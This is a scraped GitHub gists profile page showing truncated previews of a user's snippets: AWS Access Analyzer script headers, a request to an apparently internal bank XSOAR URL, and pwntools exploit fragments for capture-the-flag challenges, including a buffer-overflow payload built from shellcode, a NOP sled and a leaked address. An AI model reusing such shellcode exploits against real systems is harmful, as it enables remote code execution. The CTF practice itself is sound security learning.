Skip to content

Instantly share code, notes, and snippets.

View Rajchowdhury420's full-sized avatar
💻
just another learner

Raj Chowdhury Rajchowdhury420

💻
just another learner
  • syf
  • ::1
  • 18:36 (UTC -12:00)
View GitHub Profile
import requests
url = "https://qa-xsoar.app.somebank.com/investigation/29028"
headers = {
"accept": "application/json",
"accept-language": "en-US,en;q=0.9",
"api_truncate_results": "true",
"content-type": "application/json"
}
data = {
import angr
import claripy
import re
import hashlib
from capstone import *
import sys
from pwn import *
import time
from random import *
import os
import boto3
import json
import os
import csv
import argparse
import time
from rich.progress import Progress
from rich.pretty import pprint
from botocore.exceptions import ClientError
import boto3
import json
import os
import csv
import argparse
import time
from rich.progress import Progress
from rich.pretty import pprint
from botocore.exceptions import ClientError
import boto3
import json
import os
import csv
import argparse
from rich.progress import Progress
from rich.pretty import pprint
from botocore.exceptions import ClientError
# Configure the AWS client for Access Analyzer
https://fzl-aws.notion.site/Blackhat-Asis-CTF-BugCrowd-be2518eb7df043b5a1c90102ec0204f6?pvs=4 - log4j writeup
from pwn import *
context.arch = "amd64"
context.terminal = ["konsole","-e"]
elf = ELF("./seek")
r = remote("chal.iutctf.xyz", 6969)
#r = process("./seek")
#gdb.attach(r)
from pwn import *
r = remote("chal.iutctf.xyz", 6900)
payload = asm(shellcraft.amd64.sh(), arch='amd64')
r.recvuntil(b"lives: ")
leak = int(r.recv(14),16)
print(hex(leak))
print(len(payload))
s = b"\x90"*40+payload+p64(leak)
from pwn import *
elf = ELF("./bof64")
context.arch = "amd64"
context.terminal = ["konsole","-e"]
win1 = elf.sym['win1']
r = remote("chal.iutctf.xyz",6948)
#r = process("./bof64")